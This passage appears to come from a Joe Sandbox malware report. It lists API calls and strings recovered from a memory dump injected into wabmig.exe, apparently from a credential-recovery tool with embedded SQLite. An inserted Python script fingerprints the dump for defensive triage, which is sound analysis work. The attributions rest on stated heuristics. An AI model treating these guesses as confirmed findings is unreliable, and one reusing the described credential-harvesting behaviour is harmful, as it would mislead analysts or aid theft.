                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                            • String ID: %s (%s)$YV@
                                                                            • API String ID: 3979103747-598926743
                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                            • String ID: Unknown Error$netmsg.dll
                                                                            • API String ID: 2767993716-572158859
                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                            APIs
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                            • API String ID: 3176057301-2039793938
                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                            APIs
                                                                            Strings
                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                            • database is already attached, xrefs: 0042F721
                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                            • out of memory, xrefs: 0042F865
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                            • API String ID: 1297977491-2001300268
                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                            APIs
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                            • String ID: ($d
                                                                            • API String ID: 1140211610-1915259565
                                                                            • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                            • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                            APIs
                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                            • String ID:
                                                                            • API String ID: 3015003838-0
                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00407E44
                                                                            • memset.MSVCRT ref: 00407E5B
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 59245283-0
                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                            • free.MSVCRT ref: 004185AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                            • String ID:
                                                                            • API String ID: 2802642348-0
                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
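Several records in this dump point the same way: the SQLite ATTACH error strings ("database %s is already in use", "too many attached databases - max %d", ...), the language-INI keys read through GetPrivateProfileIntW/GetPrivateProfileStringW (general, rtl, TranslatorName, TranslatorURL, charset), and two retry loops, LockFile(?,40000000,0,1,0) followed by Sleep(1) and DeleteFileW/GetFileAttributesW/GetLastError/Sleep(0x64) with ANSI twins. Read together they say the code running inside the wabmig.exe dump (per the snapshot file name) is a password-recovery tool with SQLite compiled in, not anything wabmig.exe does on its own. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample; it turns those indicators into a dump-triage check. The sample dump bytes are constructed for the demo, the API lines are copied from the records above, and the assumption that the two retry loops are SQLite's Win32 VFS lock and delete routines is the author's reading of the call pattern, labelled as such in the code.

```python
"""Fingerprint a dumped module as a NirSoft-style credential recovery tool
with embedded SQLite, using the strings and API patterns in this report.
Added example; not Joe Sandbox or sample code."""
import re
from dataclasses import dataclass

# SQLite ATTACH error strings listed in the report (ASCII in the dump).
SQLITE_ATTACH_STRINGS = [
    b"database %s is already in use",
    b"database is already attached",
    b"too many attached databases - max %d",
    b"unable to open database: %s",
    b"cannot ATTACH database within transaction",
    b"attached databases must use the same text encoding as main database",
]
# Keys the module reads via GetPrivateProfile*W; expected as UTF-16LE.
NIRSOFT_INI_KEYS = ["general", "rtl", "TranslatorName", "TranslatorURL", "charset"]

# One report bullet, e.g. "Sleep.KERNEL32(00000064), ref: 00418571"
API_LINE = re.compile(
    r"(?P<api>[\w@?]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_api_lines(text: str) -> list:
    """Turn the report's 'APIs' bullets into ApiCall records, in listed order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def count_sqlite_attach_strings(dump: bytes) -> int:
    return sum(1 for s in SQLITE_ATTACH_STRINGS if s in dump)


def count_nirsoft_ini_keys(dump: bytes) -> int:
    """Count keys present as ASCII or UTF-16LE (the W APIs imply wide strings)."""
    return sum(1 for k in NIRSOFT_INI_KEYS
               if k.encode("ascii") in dump or k.encode("utf-16-le") in dump)


def find_sqlite_windelete(calls: list) -> list:
    """Assumed SQLite Win32 delete loop: DeleteFile -> GetFileAttributes ->
    GetLastError -> Sleep(0x64). Returns refs of the DeleteFile calls."""
    hits = []
    for i in range(len(calls) - 3):
        a, b, c, d = calls[i:i + 4]
        if (a.api in ("DeleteFileA", "DeleteFileW")
                and b.api in ("GetFileAttributesA", "GetFileAttributesW")
                and c.api == "GetLastError"
                and d.api == "Sleep" and d.args[:1] == ["00000064"]):
            hits.append(a.ref)
    return hits


def find_sqlite_winlock(calls: list) -> list:
    """Assumed SQLite pending-byte lock: LockFile(h, 0x40000000, 0, 1, 0), Sleep(1)."""
    hits = []
    for i in range(len(calls) - 1):
        a, b = calls[i], calls[i + 1]
        if (a.api == "LockFile" and a.args[1:4] == ["40000000", "00000000", "00000001"]
                and b.api == "Sleep" and b.args[:1] == ["00000001"]):
            hits.append(a.ref)
    return hits


def classify(dump: bytes, calls: list) -> dict:
    r = {
        "sqlite_attach_strings": count_sqlite_attach_strings(dump),
        "nirsoft_ini_keys": count_nirsoft_ini_keys(dump),
        "sqlite_windelete_refs": find_sqlite_windelete(calls),
        "sqlite_winlock_refs": find_sqlite_winlock(calls),
    }
    sqlite = (r["sqlite_attach_strings"] >= 3 or bool(r["sqlite_windelete_refs"])
              or bool(r["sqlite_winlock_refs"]))
    nirsoft = r["nirsoft_ini_keys"] >= 3
    if sqlite and nirsoft:
        r["verdict"] = "nirsoft-style credential recovery tool with embedded sqlite"
    elif sqlite:
        r["verdict"] = "embedded sqlite"
    elif nirsoft:
        r["verdict"] = "nirsoft-style tool"
    else:
        r["verdict"] = "no match"
    return r


# Constructed dump: PE-ish header filler, 4 of the 6 SQLite strings, all INI keys as UTF-16LE.
SAMPLE_DUMP = (b"MZ" + b"\x00" * 62 + b"\x00".join(SQLITE_ATTACH_STRINGS[:4]) + b"\x00" * 16
               + b"\x00\x00".join(k.encode("utf-16-le") for k in NIRSOFT_INI_KEYS) + b"\x00\x00")

# API bullets copied from this report's records.
SAMPLE_API_TEXT = """
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
• DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• free.MSVCRT ref: 004185AC
"""

if __name__ == "__main__":
    for key, val in classify(SAMPLE_DUMP, parse_api_lines(SAMPLE_API_TEXT)).items():
        print(key, [hex(v) for v in val] if isinstance(val, list) else val)
```

On a real dump, feed the raw .sdmp bytes to classify() and the report's API bullets (or your own API-trace export in the same shape) to parse_api_lines(); the string counts alone are weak evidence, so the verdict only escalates when the API-sequence heuristics agree. The same SQLite fingerprint will also fire on benign software that bundles SQLite, which is why the INI-key check is kept separate.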
                                                                            APIs
                                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                            • API String ID: 3510742995-3273207271
                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                            • memset.MSVCRT ref: 00413ADC
                                                                            • memset.MSVCRT ref: 00413AEC
                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                            • memset.MSVCRT ref: 00413BD7
                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                            • String ID: 3A
                                                                            • API String ID: 3300951397-293699754
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
APIs
• memset.MSVCRT ref: 00411AF6
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 00411B14
• wcscat.MSVCRT ref: 00411B2E
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405C27
• GetDlgItem.USER32(?,000003E9), ref: 00405C3A
• GetDlgItem.USER32(?,000003E9), ref: 00405C4F
• GetDlgItem.USER32(?,000003E9), ref: 00405C67
• EndDialog.USER32(?,00000002), ref: 00405C83
• EndDialog.USER32(?,00000001), ref: 00405C98
  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
• SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
APIs
• _wcsicmp.MSVCRT ref: 00444D09
• _wcsicmp.MSVCRT ref: 00444D1E
• _wcsicmp.MSVCRT ref: 00444D33
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
APIs
• ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
• memset.MSVCRT ref: 00405E33
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
• InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
• SetFocus.USER32(?,?,?,?), ref: 00405EB8
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
APIs
• GetClientRect.USER32(?,?), ref: 00405F65
• GetWindow.USER32(?,00000005), ref: 00405F7D
• GetWindow.USER32(00000000), ref: 00405F80
  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
• GetWindow.USER32(00000000,00000002), ref: 00405F8C
• GetDlgItem.USER32(?,0000040C), ref: 00405FA2
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
• GetDlgItem.USER32(?,0000040E), ref: 00405FEB
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
APIs
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• API String ID: 3510742995-2446657581
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
